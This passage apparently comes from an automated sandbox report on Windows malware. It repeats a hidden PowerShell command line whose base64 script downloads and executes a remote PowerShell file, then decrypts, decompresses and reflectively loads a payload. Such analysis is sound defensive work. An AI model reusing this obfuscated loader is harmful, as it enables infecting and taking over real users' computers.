ZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGF